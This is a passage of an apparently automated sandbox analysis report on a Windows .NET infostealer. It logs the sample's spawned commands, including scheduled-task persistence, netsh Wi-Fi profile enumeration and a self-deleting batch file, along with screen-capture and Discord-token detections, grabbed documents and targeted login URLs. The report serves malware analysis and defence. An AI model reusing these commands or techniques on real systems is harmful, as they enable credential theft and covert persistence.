Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.mercadolibre.com.co/registration-buy
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.miclaroapp.com.co/
Source: tmp756C.tmp.dat.0.dr String found in binary or memory: https://www.mozilla.org
Source: tmp756C.tmp.dat.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: tmp756C.tmp.dat.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: History.txt.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/)
Source: HTZ4az17lj.exe, 00000000.00000002.2138246850.000002959166F000.00000004.00000800.00020000.00000000.sdmp, HTZ4az17lj.exe, 00000000.00000002.2138246850.00000295910EE000.00000004.00000800.00020000.00000000.sdmp, places.raw.0.dr, tmp756C.tmp.dat.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: tmp756C.tmp.dat.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: HTZ4az17lj.exe, 00000000.00000002.2138246850.000002959166F000.00000004.00000800.00020000.00000000.sdmp, HTZ4az17lj.exe, 00000000.00000002.2138246850.00000295910EE000.00000004.00000800.00020000.00000000.sdmp, places.raw.0.dr, tmp756C.tmp.dat.0.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: HTZ4az17lj.exe, 00000000.00000002.2138246850.000002959166F000.00000004.00000800.00020000.00000000.sdmp, HTZ4az17lj.exe, 00000000.00000002.2138246850.00000295910EE000.00000004.00000800.00020000.00000000.sdmp, places.raw.0.dr, tmp756C.tmp.dat.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.mundialdetornillos.com/index.php
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.panamericana.com.co/registro/inicio
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.paypal.com/signin
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.paypal.com/webapps/hermes
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.pdffiller.com/en/login.htm
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.pinterest.com/smmmokin14/woodworking-tips-and-jigs/
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.pinterest.es/
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.ptreeorder.com/custinfo.asp
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.spotify.com/co/signup/
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.themakersmob.com/register/resend
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.tumblr.com/register
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.vectorart3d.com/store/
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.vova.com/es/login.php
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.woodsmithlibrary.com/account/password/reset/complete/
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.woodsmithplans.com/account/
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.woodsmithshop.com/account/login/
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.woodsmithvideoedition.com/account/login/
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.wwgoa.com/checkout/
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown HTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49727 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to capture screen (.Net source)
Source: HTZ4az17lj.exe, Type_7.cs .Net Code: Method_17
Source: uuhbr0xg.h20.exe.0.dr, Type_7.cs .Net Code: Method_17

Spam, unwanted Advertisements and Ransom Demands
barindex
Modifies existing user documents (likely ransomware behavior)
Source: C:\Users\user\Desktop\HTZ4az17lj.exe File deleted: C:\Users\user\AppData\Local\d0d733758fee67ef1333def91e74c359\user@226533_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EEGWXUHVUG.xlsx Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe File deleted: C:\Users\user\AppData\Local\d0d733758fee67ef1333def91e74c359\user@226533_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PIVFAGEAAV\PIVFAGEAAV.docx Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe File deleted: C:\Users\user\AppData\Local\d0d733758fee67ef1333def91e74c359\user@226533_en-CH\Grabber\DRIVE-C\Users\user\Desktop\SQSJKEBWDT\ZGGKNSUKOP.jpg Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe File deleted: C:\Users\user\AppData\Local\d0d733758fee67ef1333def91e74c359\user@226533_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL.png Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe File deleted: C:\Users\user\AppData\Local\d0d733758fee67ef1333def91e74c359\user@226533_en-CH\Grabber\DRIVE-C\Users\user\Desktop\SQSJKEBWDT.docx Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: HTZ4az17lj.exe PID: 6044, type: MEMORYSTR Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Detected potential crypto function
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Code function: 0_2_00007FF848F1A18D 0_2_00007FF848F1A18D
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Code function: 0_2_00007FF848F19380 0_2_00007FF848F19380
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Code function: 0_2_00007FF848F1CDFB 0_2_00007FF848F1CDFB
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Code function: 0_2_00007FF848F16522 0_2_00007FF848F16522
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Code function: 0_2_00007FF848F15776 0_2_00007FF848F15776
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Code function: 0_2_00007FF848F19318 0_2_00007FF848F19318
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Code function: 0_2_00007FF848F21EB3 0_2_00007FF848F21EB3
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Code function: 0_2_00007FF848F20862 0_2_00007FF848F20862
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Code function: 0_2_00007FF848F20754 0_2_00007FF848F20754
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Code function: 11_2_00007FF848F16522 11_2_00007FF848F16522
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Code function: 11_2_00007FF848F15776 11_2_00007FF848F15776
PE file does not import any functions
Source: uuhbr0xg.h20.exe.0.dr Static PE information: No import functions for PE file found
Source: HTZ4az17lj.exe Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: HTZ4az17lj.exe, 00000000.00000002.2147805254.00000295F7610000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamestub.exe. vs HTZ4az17lj.exe
Source: HTZ4az17lj.exe, 00000000.00000000.1969232734.00000295F4C32000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamechrome.exe. vs HTZ4az17lj.exe
Source: HTZ4az17lj.exe Binary or memory string: OriginalFilenamechrome.exe. vs HTZ4az17lj.exe
Yara signature match
Source: 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: HTZ4az17lj.exe PID: 6044, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: HTZ4az17lj.exe, Type_6.cs Base64 encoded string: 'SFUUwksm21Jo5J+5xTj7msRAcfAo4qs7FQBZp/dECCssEyp3hstrrTA/CRzvoiV5'
Source: HTZ4az17lj.exe, Type_9.cs Base64 encoded string: 'pGK3kkOcyYdGAAPi/8G6N1XJe1C6K1NE48AddJAp9UpqE9ETf3AYgdAt7XPV9u0z'
Source: HTZ4az17lj.exe, Type_8.cs Base64 encoded string: 'Q2p2SPXgwvXo/KwkT4QnizazbFyIJgLa+XpGPG4a4S8Ak3GktEL20KbbAInC27pJ'
Source: HTZ4az17lj.exe, Type_7.cs Base64 encoded string: 'gH+tHsKNvsbZ1EWhvkP3EI/4krTieZANT0IAF7dhi4rYvHth2WCRnUgs3pnZNNdzV+fF2DM4tXqFk8/R+sF11/V8uT2G+0Jglr9qFD7nWN3TcH2IdXXT5szSY8lpN/c5ERsM6YxPhnZV3qDkhjRx7r+lRv0Gd4haNDkFJkOp6Pg='
Source: HTZ4az17lj.exe, Type_1.cs Base64 encoded string: '+q2Xl7nHs88OaG9hRih/YibRq4qMW5kY8sZJTp1DrGhRXrx4v2zsTeMTNjbUQPzx'
Source: uuhbr0xg.h20.exe.0.dr, Type_6.cs Base64 encoded string: 'SFUUwksm21Jo5J+5xTj7msRAcfAo4qs7FQBZp/dECCssEyp3hstrrTA/CRzvoiV5'
Source: uuhbr0xg.h20.exe.0.dr, Type_9.cs Base64 encoded string: 'pGK3kkOcyYdGAAPi/8G6N1XJe1C6K1NE48AddJAp9UpqE9ETf3AYgdAt7XPV9u0z'
Source: uuhbr0xg.h20.exe.0.dr, Type_8.cs Base64 encoded string: 'Q2p2SPXgwvXo/KwkT4QnizazbFyIJgLa+XpGPG4a4S8Ak3GktEL20KbbAInC27pJ'
Source: uuhbr0xg.h20.exe.0.dr, Type_7.cs Base64 encoded string: 'gH+tHsKNvsbZ1EWhvkP3EI/4krTieZANT0IAF7dhi4rYvHth2WCRnUgs3pnZNNdzV+fF2DM4tXqFk8/R+sF11/V8uT2G+0Jglr9qFD7nWN3TcH2IdXXT5szSY8lpN/c5ERsM6YxPhnZV3qDkhjRx7r+lRv0Gd4haNDkFJkOp6Pg='
Source: uuhbr0xg.h20.exe.0.dr, Type_1.cs Base64 encoded string: '+q2Xl7nHs88OaG9hRih/YibRq4qMW5kY8sZJTp1DrGhRXrx4v2zsTeMTNjbUQPzx'
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@62/153@6/7
Source: C:\Users\user\Desktop\HTZ4az17lj.exe File created: C:\Users\user\AppData\Local\d0d733758fee67ef1333def91e74c359 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3692:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1480:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5972:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Mutant created: \Sessions\1\BaseNamedObjects\ITVRTSJIKEJWQ2NQGJOZ
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
Source: C:\Users\user\Desktop\HTZ4az17lj.exe File created: C:\Users\user\AppData\Local\Temp\ndoyz5n0.3un Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpB2A0.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpB2A0.tmp.bat
Source: HTZ4az17lj.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: HTZ4az17lj.exe Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 6044)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 6044)
Source: C:\Users\user\Desktop\HTZ4az17lj.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: tmp59AE.tmp.dat.0.dr, tmp90FB.tmp.dat.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: HTZ4az17lj.exe ReversingLabs: Detection: 44%
Source: HTZ4az17lj.exe Virustotal: Detection: 55%
Source: C:\Users\user\Desktop\HTZ4az17lj.exe File read: C:\Users\user\Desktop\HTZ4az17lj.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\HTZ4az17lj.exe "C:\Users\user\Desktop\HTZ4az17lj.exe"
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTask
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Temp\p.html
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTask
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe /sc minute /mo 5
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1952,i,15724053339194688930,12067670684069383472,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTask
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Temp\p.html
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTask
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1980,i,12318035346667771544,14619284953737115548,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpB2A0.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpB2A0.tmp.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe TaskKill /F /IM 6044
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe Timeout /T 2 /Nobreak
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTask Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Temp\p.html Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTask Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe /sc minute /mo 5 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpB2A0.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpB2A0.tmp.bat Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1952,i,15724053339194688930,12067670684069383472,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
